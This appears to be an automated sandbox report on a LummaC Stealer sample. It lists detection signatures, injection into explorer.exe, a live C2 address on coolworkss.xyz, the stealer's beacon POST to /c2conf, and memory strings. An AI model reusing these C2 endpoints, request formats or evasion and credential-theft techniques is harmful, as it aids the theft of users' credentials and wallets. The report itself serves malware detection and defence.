Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lJ2eYRm0Bd.exe

Overview

General Information

Sample Name:lJ2eYRm0Bd.exe
Original Sample Name:37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987.exe
Analysis ID:1303447
MD5:47d732373d0f515ccb37b09f2f55d178
SHA1:0365f9d183117fd29ab29574b74b67c570651918
SHA256:37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987
Tags:exe
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected LummaC Stealer
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Query firmware table information (likely to detect VMs)
Performs DNS queries to domains with low reputation
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found evasive API chain (may stop execution after checking volume information)
Tries to harvest and steal browser information (history, passwords, etc)
Found evasive API chain (may stop execution after checking computer name)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Searches for user specific document files
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Allocates memory with a write watch (potentially for evading sandboxes)
Drops PE files
Contains functionality to read the PEB
PE / OLE file has an invalid certificate
Found evasive API chain (may stop execution after accessing registry keys)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • lJ2eYRm0Bd.exe (PID: 6968 cmdline: C:\Users\user\Desktop\lJ2eYRm0Bd.exe MD5: 47D732373D0F515CCB37B09F2F55D178)
    • cmd.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • cleanup
{"C2 url": "http://coolworkss.xyz/c2conf"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: cmd.exe PID: 7020JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      Process Memory Space: explorer.exe PID: 5632JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        Process Memory Space: explorer.exe PID: 5632JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          Process Memory Space: explorer.exe PID: 5632JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            No Sigma rule has matched
            Timestamp:192.168.2.4172.67.195.22949738802046637 09/05/23-13:02:23.880969
            SID:2046637
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: explorer.exe.5632.19.memstrminMalware Configuration Extractor: LummaC {"C2 url": "http://coolworkss.xyz/c2conf"}
            Source: lJ2eYRm0Bd.exeReversingLabs: Detection: 21%
            Source: http://coolworkss.xyz/rAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sockOAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sock_Avira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sock?Avira URL Cloud: Label: phishing
            Source: http://coolworkss.xyz/44sAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sockAvira URL Cloud: Label: phishing
            Source: http://coolworkss.xyz:80/c2sockaAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sock/Avira URL Cloud: Label: phishing
            Source: http://coolworkss.xyz/c2sock3Avira URL Cloud: Label: malware
            Source: http://coolworkss.xyz:80/c2sockAvira URL Cloud: Label: phishing
            Source: http://coolworkss.xyz/5Avira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sock:Avira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/UAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/yO3GNZAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2confAvira URL Cloud: Label: phishing
            Source: http://coolworkss.xyz/Avira URL Cloud: Label: malware
            Source: http://coolworkss.xyz:80/c2sock;Avira URL Cloud: Label: phishing
            Source: http://coolworkss.xyz/c2sockwAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2socktAvira URL Cloud: Label: malware
            Source: http://coolworkss.xyz/c2sockyAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\kheeknpomAvira: detection malicious, Label: TR/Spy.Agent.elwjq
            Source: C:\Users\user\AppData\Local\Temp\kheeknpomReversingLabs: Detection: 83%
            Source: C:\Users\user\AppData\Local\Temp\kheeknpomJoe Sandbox ML: detected
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_cf542f41-1
            Source: unknownHTTPS traffic detected: 104.18.6.142:443 -> 192.168.2.4:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.6.94:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.32.193:443 -> 192.168.2.4:49719 version: TLS 1.2
            Source: lJ2eYRm0Bd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdb source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.00000000039D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000001.00000002.372995350.0000000005631000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.373078984.0000000005950000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455324211.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455428620.0000000005040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdbUGP source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.00000000039D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: cmd.exe, 00000001.00000002.372995350.0000000005631000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.373078984.0000000005950000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455324211.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455428620.0000000005040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D807F FindFirstFileExW,19_2_008D807F
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D8133 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_008D8133

            Networking

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.60.111 80Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.195.229 80Jump to behavior
            Source: TrafficSnort IDS: 2046637 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt 192.168.2.4:49738 -> 172.67.195.229:80
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeDNS query: coolworkss.xyz
            Source: DNS query: coolworkss.xyz
            Source: Malware configuration extractorURLs: http://coolworkss.xyz/c2conf
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveHost: wwf.org
            Source: global trafficHTTP traffic detected: GET /?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org HTTP/1.1Connection: Keep-AliveHost: www.worldwildlife.org
            Source: global trafficHTTP traffic detected: GET /2lsHcHC.png HTTP/1.1Connection: Keep-AliveHost: i.imgur.com
            Source: global trafficHTTP traffic detected: POST /c2conf HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: coolworkss.xyzContent-Length: 36Cache-Control: no-cacheData Raw: 6c 69 64 3d 69 4f 71 70 49 71 2d 2d 50 65 74 74 65 72 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: lid=iOqpIq--Petter&j=default&ver=4.0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/v8/wiki/DebuggerProtocol
            Source: explorer.exe, 00000013.00000003.352936105.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032D1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455599716.0000000005CE6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/
            Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/44s
            Source: explorer.exe, 00000013.00000002.455198443.000000000334B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/5
            Source: explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/U
            Source: explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2conf
            Source: explorer.exe, 00000013.00000003.366720503.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.357518038.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sock
            Source: explorer.exe, 00000013.00000003.353007918.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sock/
            Source: explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sock3
            Source: explorer.exe, 00000013.00000002.455198443.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sock:
            Source: explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sock?
            Source: explorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sockO
            Source: explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sock_
            Source: explorer.exe, 00000013.00000003.375236074.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.359062273.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.360661950.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.357518038.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455543101.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.376847383.0000000005A1E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sockt
            Source: explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2sockw
            Source: explorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/c2socky
            Source: explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/r
            Source: explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz/yO3GNZ
            Source: explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz:80/c2sock
            Source: explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz:80/c2sock;
            Source: explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://coolworkss.xyz:80/c2socka
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.co(m/D
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daniel.haxx.se/blog/2011/02/21/localhost-hack-on-windows/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://insanecoding.blogspot.com/2007/11/pathmax-simply-isnt.html
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invisible-island.net/xterm/ctlseqs/ctlseqs.html
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mathiasbynens.be/notes/javascript-encoding
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mths.be/punycode
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://narwhaljs.org)
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pod.tst.eu/http://cvs.schmorp.de/libev/ev.pod#Be_smart_about_timeouts
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
